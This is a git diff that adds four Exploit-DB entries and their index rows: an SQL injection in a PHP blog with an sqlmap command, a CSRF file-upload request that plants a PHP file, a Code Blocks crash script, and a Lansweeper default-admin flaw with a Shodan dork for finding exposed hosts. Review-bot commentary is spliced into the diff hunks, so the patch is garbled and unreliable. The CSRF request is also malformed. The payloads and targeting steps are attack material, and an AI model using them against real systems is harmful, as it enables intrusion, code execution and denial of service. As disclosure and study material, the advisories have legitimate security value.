diff --git a/exploits/php/webapps/48615.txt b/exploits/php/webapps/48615.txt
new file mode 100644
index 000000000..2bd931a68
--- /dev/null
+++ b/exploits/php/webapps/48615.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Responsive Online Blog 1.0 - 'id' SQL Injection
+# Date: 2020-06-23
+# Exploit Author: Eren Şimşek
+# Vendor Homepage: https://www.sourcecodester.com/php/14194/responsive-online-blog-website-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14194&title=Responsive+Online+Blog+Website+using+PHP%2FMySQL
+# Version: v1.0
+# Tested on: Linux - Wamp Server
+
+>Vulnerable File
+ /category.php
+
+>Vulnerable Code
+
+ $id=$_REQUEST['id'];
+ $query="SELECT * from blog_categories where id='".$id."'";
+ Id parameter enters sql query without any changes
+
+>Proof Of Concept
+ sqlmap 'http://localhost/resblog/category.php?id=1' --dbs --batch
+ OR
+ http://TARGET/resblog/category.php?id=1' Single Quote will cause SQL error
\ No newline at end of file
diff --git a/exploits/php/webapps/48616.txt b/exploits/php/webapps/48616.txt
new file mode 100644
index 000000000..15db21344
--- /dev/null
+++ b/exploits/php/webapps/48616.txt
@@ -0,0 +1,89 @@
+# Exploit Title: Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
+# Google Dork: N/A
+# Date: 2020-06-20
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability:
+
+This product is unprotected against CSRF vulnerabilities.
+The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests.
+you can upload a PHP file here with CSRF.
+
+# CSRF PoC( add student ,File Upload):
+
+
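Review bot: The vendor-side fix is missing from the 48615 advisory: `$id=$_REQUEST['id'];` is concatenated straight into the SELECT in category.php, and the "Vulnerable Code" section should state the remediation so it is actionable, e.g. `$stmt = $db->prepare("SELECT * FROM blog_categories WHERE id = ?");` followed by binding `$id` as an integer (whether the app uses mysqli or PDO is not visible in the hunk, so the exact binding call depends on that). Reading from `$_REQUEST` also means the injection is reachable via POST bodies and cookies, not only the query string the PoC shows, which is worth one sentence. The single-quote PoC demonstrates only a SQL error, so the text should say whether data extraction was actually confirmed; the `sqlmap ... --dbs` line suggests it was, but the result is not recorded. The "Tested on: Linux - Wamp Server" line looks inconsistent, since WampServer is a Windows stack, so presumably one of the two is a typo.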
+
+
+
+
+#HTTP Request:
+
+http://localhost/student_enrollment/admin/index.php?page=add-student
+
+POST /student_enrollment/admin/index.php?page=add-student HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------1586330740172
+Content-Length: 1669
+Referer: http://localhost/exploit2.php
+Cookie: _ga=GA1.1.1667382299.1577635358; PHPSESSID=2dhsgkdiavgfefp6g0qp63ruqe
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------1586330740172: undefined
+Content-Disposition: form-data; name="name"
+bkpatron
+-----------------------------1586330740172
+Content-Disposition: form-data; name="roll"
+
+333000
+-----------------------------1586330740172
+Content-Disposition: form-data; name="address"
+
+0000
+-----------------------------1586330740172
+Content-Disposition: form-data; name="pcontact"
+
+01911111111
+-----------------------------1586330740172
+Content-Disposition: form-data; name="class"
+
+1st
+-----------------------------1586330740172
+Content-Disposition: form-data; name="photo"; filename="up.php"
+Content-Type: application/octet-stream
+...
+
+// uploaded file path: http://localhost/student_enrollment/admin/images/your_file.php
\ No newline at end of file
diff --git a/exploits/windows/dos/48617.py b/exploits/windows/dos/48617.py
new file mode 100755
index 000000000..4625c4202
--- /dev/null
+++ b/exploits/windows/dos/48617.py
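Review bot: The HTTP request in the 48616 advisory cannot be replayed as written: the first boundary line carries a stray `: undefined` suffix, and the `name="name"` part lacks the blank line that separates part headers from the value (every other part has it), so a reader pasting the request into a proxy gets a malformed multipart body. The PoC section between `# CSRF PoC( add student ,File Upload):` and `#HTTP Request:` is empty in this hunk, which looks like the HTML form was lost rather than omitted on purpose; if so, the committed file lacks the actual CSRF page that the title promises. The `Cookie: ... PHPSESSID=...` header reveals the precondition the text never states: the victim must be an authenticated admin and the session cookie must carry no SameSite protection, which should be spelled out under "Vulnerability". The index rows added in this same diff already list 48610 as an unauthenticated arbitrary file upload for the same product, so the advisory should say what the CSRF vector adds beyond that.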
@@ -0,0 +1,34 @@
+# Exploit Title: Code Blocks 20.03 - Denial Of Service (PoC)
+# Vendor Homepage: http://www.codeblocks.org/
+# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03-setup.exe/download
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-06-23
+# Vulnerable Software: Code Blocks
+# Version: 20.03
+# Vulnerability Type: Denial of Service (DoS)
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
+
+#Steps to Produce the Crash:
+
+# 1.- Run python code: CodeBlocksCrash.py
+# 2.- Copy content to clipboard
+# 3.- Open "codeblocks.exe"
+# 4.- In the "Management" section on left hand side, Click on "FSymbols" tab.
+# 5.- Select "Active project's symbols" from drop down "View:" menu.
+# 6.- Paste ClipBoard into the "Search:" field.
+# 7.- Press Enter from keyboard.
+# 8.- Crashed.
+
+
+##################################################################################################################################################
+
+
+#Python "CodeBlocksCrash.py" Code:
+
+f= open("CodeBlocksCrash.txt", "w")
+
+payload="\x41" * 5000
+
+f.write(payload)
+
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48618.txt b/exploits/windows/local/48618.txt
new file mode 100644
index 000000000..e4f645f9f
--- /dev/null
+++ b/exploits/windows/local/48618.txt
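Review bot: The advisory records no crash details at all — no faulting module, exception code or register state — so a reader cannot tell whether the "Crashed." at step 8 is a controllable overflow in the FSymbols search field or a benign unhandled exception, and a DoS entry without that is hard to triage; a one-line `# Crash: <exception code> in <module> at <offset> (WinDbg/!exploitable output attached)` would make it useful. The script itself leaves the handle to a manual `f.close()` with no context manager and writes `"\x41" * 5000`, which in a str literal is simply the letter A; the idiomatic form is `with open("CodeBlocksCrash.txt", "w") as f:` followed by `f.write("A" * 5000)`. Step 2 says to copy the content to the clipboard, but the script never does that, so either the step should say "open the file and copy its content" or the script should do it. Step 5 selects "Active project's symbols", so presumably the crash only reproduces with a project open; the steps should state that precondition.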
@@ -0,0 +1,54 @@
+# Exploit Title: Lansweeper 7.2 - Incorrect Access Control
+# SHODAN DORK : title:"Lansweeper - Login"
+# Date: 2020-06-14
+# Exploit Author: Amel BOUZIANE-LEBLOND
+# Vendor Homepage: https://www.lansweeper.com/
+# Software Link: https://www.lansweeper.com
+# Version: 6.0.x through 7.2.x
+# Tested on: Windows
+# CVE : CVE-2020-14011
+
+### Title:
+Incorrect Access Control.
+
+### Category:
+Exploit
+
+### Severity:
+Critical
+
+### Description:
+Lansweeper 6.0.x through 7.2.x has a default installation in which the
+admin password is configured for the admin account, unless "Built-in
+admin" is manually unchecked. This allows command execution via the
+Add New Package and Scheduled Deployments features.
+
+### Other observation:
+Hi, This issue is kind of critical,
+By using shodan with this filter title:"Lansweeper - Login"
+We will find some Lansweeper with default installation on it
+
+
+### Details:
+The Lansweeper application is agentless network inventory software that can be used for IT asset management.
+It uses the ASP.NET technology on its web application.
+
+### Analysis:
+When you install Lansweeper 6.0 or a more recent Lansweeper release and access the web console for the first time,
+you are presented with a First Run Wizard,
+which allows you to set up scanning and configure some basic options.
+Any subsequent times you access the console,
+you are presented with a login screen.
+By default, everyone in your network can access all of Lansweeper's features and menus simply by browsing to the web console URL and hitting the Built-in Admin button.
+
+### Suggested mitigation:
+restrict access to the console and configure what users can see or do once they've been granted access.
+You assign a built-in or custom user role, a set of permissions, to user groups or individual user accounts.
+A user's role determines what the user can see or do within the console..
+
+### Impact/Risk:
+Remote code execution
+can expose the organization to unauthorized access of data and programs, fraud.
+
+--
+Amel BOUZIANE-LEBLOND
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ba82b8ad1..3311e42a9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6751,6 +6751,7 @@ id,file,description,date,author,type,platform,port
 38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
 43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
 48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
+48617,exploits/windows/dos/48617.py,"Code Blocks 20.03 - Denial Of Service (PoC)",2020-06-23,"Paras Bhatia",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
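Review bot: The 48618 advisory asserts command execution via "Add New Package" and "Scheduled Deployments" but gives no request, package definition or step sequence demonstrating it, so the "Critical" rating and the "Remote code execution" impact rest on an unsupported claim; a minimal sequence (enter via the Built-in Admin button, create a package with a command step, schedule it against a scanned host) would let a reader verify it. The Description is also hard to reconcile with the Analysis: "the admin password is configured for the admin account" reads as if a password is set, while the Analysis says anyone can hit the Built-in Admin button without one; presumably the intended statement is that the built-in admin login is enabled with no credential check unless the "Built-in admin" option is unchecked during the First Run Wizard, and the text should say that directly. The Suggested mitigation should lead with disabling that built-in admin account, which the Description itself names, rather than only role assignment, since roles do not help when the login itself is bypassed. The index row in this diff files the entry under local/windows, while the Shodan dork and the "everyone in your network" wording describe a remote, unauthenticated condition, so the classification looks wrong.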
@@ -11112,6 +11113,7 @@ id,file,description,date,author,type,platform,port
 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
 48594,exploits/windows/local/48594.py,"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)",2020-06-17,"Paras Bhatia",local,windows,
+48618,exploits/windows/local/48618.txt,"Lansweeper 7.2 - Incorrect Access Control",2020-06-23,"Amel BOUZIANE-LEBLOND",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42871,3 +42873,5 @@ id,file,description,date,author,type,platform,port
 48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
 48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
 48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
+48615,exploits/php/webapps/48615.txt,"Responsive Online Blog 1.0 - 'id' SQL Injection",2020-06-23,"Eren Şimşek",webapps,php,
+48616,exploits/php/webapps/48616.txt,"Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)",2020-06-23,BKpatron,webapps,php,